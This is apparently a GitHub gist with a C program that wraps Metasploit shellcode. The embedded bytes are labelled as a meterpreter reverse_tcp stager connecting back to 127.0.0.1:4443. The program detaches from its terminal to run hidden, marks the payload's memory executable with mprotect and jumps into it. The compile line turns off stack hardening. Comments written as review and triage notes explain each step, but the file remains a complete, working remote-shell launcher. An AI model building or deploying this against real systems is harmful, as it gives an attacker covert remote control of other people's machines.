Created
April 29, 2018 00:26
wrapper for msf shellcode
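/*
Daemonized ShellCode Wrapper
To compile:
$ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
(-fno-stack-protector omits stack canaries; -z execstack marks the binary as
requiring an executable stack. Both switch off default hardening.)
*/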
#include <stdio.h> | |
#include <unistd.h> | |
#include <stdlib.h> | |
#include <sys/mman.h> | |
#include <sys/stat.h> | |
/*
 * Payload: linux/x64/meterpreter/reverse_tcp (Metasploit staged payload)
 * Connect-back endpoint: 127.0.0.1, port 4443
 */
/*
 * Raw machine-code bytes for the payload named in the comment above.
 *
 * The array holds 127 payload bytes plus the string literal's terminating
 * NUL, so sizeof buf is 128. It is an ordinary initialized global, which is
 * normally mapped read/write but not executable; main() changes the page
 * protection with mprotect() before jumping into it.
 *
 * The bytes are opaque data as far as the C compiler is concerned. Nothing
 * in this file validates or parses them.
 */
unsigned char buf[] =
    "\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9"
    "\x6a\x22\x41\x5a\xb2\x07\x0f\x05\x48\x85\xc0\x78\x5b\x6a\x0a"
    "\x41\x59\x56\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f"
    "\x05\x48\x85\xc0\x78\x44\x48\x97\x48\xb9\x02\x00\x11\x5b\x7f"
    "\x00\x00\x01\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05"
    "\x48\x85\xc0\x79\x1b\x49\xff\xc9\x74\x22\x6a\x23\x58\x6a\x00"
    "\x6a\x05\x48\x89\xe7\x48\x31\xf6\x0f\x05\x48\x85\xc0\x79\xb7"
    "\xeb\x0c\x59\x5e\x5a\x0f\x05\x48\x85\xc0\x78\x02\xff\xe6\x6a"
    "\x3c\x58\x6a\x01\x5f\x0f\x05";
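/*
 * <stdlib.h> already defines both macros. Guard the local definitions so
 * this file never redefines them with a conflicting value on a platform
 * whose libc uses different numbers.
 */
#ifndef EXIT_SUCCESS
#define EXIT_SUCCESS 0
#endif
#ifndef EXIT_FAILURE
#define EXIT_FAILURE 1
#endif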
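/**
 * Detach the calling process from the session that launched it.
 *
 * Returns immediately when the parent is already PID 1. Otherwise it forks
 * and lets the parent exit with EXIT_SUCCESS. The child then clears the
 * umask, starts a new session, changes directory to "/" and points
 * stdin/stdout/stderr at /dev/null. Any failing step ends the process with
 * EXIT_FAILURE.
 *
 * Triage note: after the parent exits, the surviving child has no
 * controlling terminal, its working directory is "/", and all three
 * standard streams refer to /dev/null.
 */
static void daemonize(void)
{
    /* A parent PID of 1 is taken to mean the process is already detached. */
    if (getppid() == 1) {
        return;
    }

    pid_t pid = fork();
    if (pid < 0) {
        exit(EXIT_FAILURE);
    }
    if (pid > 0) {
        /* Parent side: hand control back to whoever launched us. */
        exit(EXIT_SUCCESS);
    }

    /* Child side from here on. */

    /*
     * NOTE(review): umask(0) means any file created later gets exactly the
     * mode bits requested, including group/world write. Kept unchanged to
     * preserve the original behaviour.
     */
    umask(0);

    /* A new session drops the controlling terminal. */
    if (setsid() < 0) {
        exit(EXIT_FAILURE);
    }

    /* Do not pin whatever directory the program was started from. */
    if (chdir("/") < 0) {
        exit(EXIT_FAILURE);
    }

    /*
     * The original ignored freopen() results. A NULL return leaves the
     * stream closed, so later stdio calls on it would be undefined.
     * Fail instead of continuing in that state.
     */
    if (freopen("/dev/null", "r", stdin) == NULL ||
        freopen("/dev/null", "w", stdout) == NULL ||
        freopen("/dev/null", "w", stderr) == NULL) {
        exit(EXIT_FAILURE);
    }
}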
/*
 * Entry point: detach via daemonize(), make the page holding the start of
 * buf readable/writable/executable, then call buf as a function.
 *
 * argc and argv are not used.
 *
 * What the visible code does, for anyone analysing a binary built from it:
 *  - The page address is derived by clearing the low 12 bits of buf's
 *    address, i.e. a 4 KiB page size is hard-coded.
 *  - mprotect() is called with length 1, so only the single page containing
 *    that address has its protection changed.
 *  - The requested protection is RWX on a page of the program's own data.
 *    A write+execute mapping created this way is the kind of event that
 *    W^X policies and audit rules on mprotect() with PROT_EXEC observe.
 *  - If mprotect() fails, the process exits with EXIT_FAILURE before the
 *    buffer is ever called.
 */
void main(int argc, char**argv)
{
    daemonize();

    /* Same value as (0UL - 1UL) ^ 0xfff: every bit set except the low 12. */
    const unsigned long page_mask = ~0xfffUL;
    void *page_start = (void *)((unsigned long)buf & page_mask);

    if (mprotect(page_start, 1, PROT_READ | PROT_WRITE | PROT_EXEC) != 0) {
        exit(EXIT_FAILURE);
    }

    /* Treat the byte array as a void(void) function and call it. */
    void (*entry)(void) = (void (*)(void))buf;
    entry();
}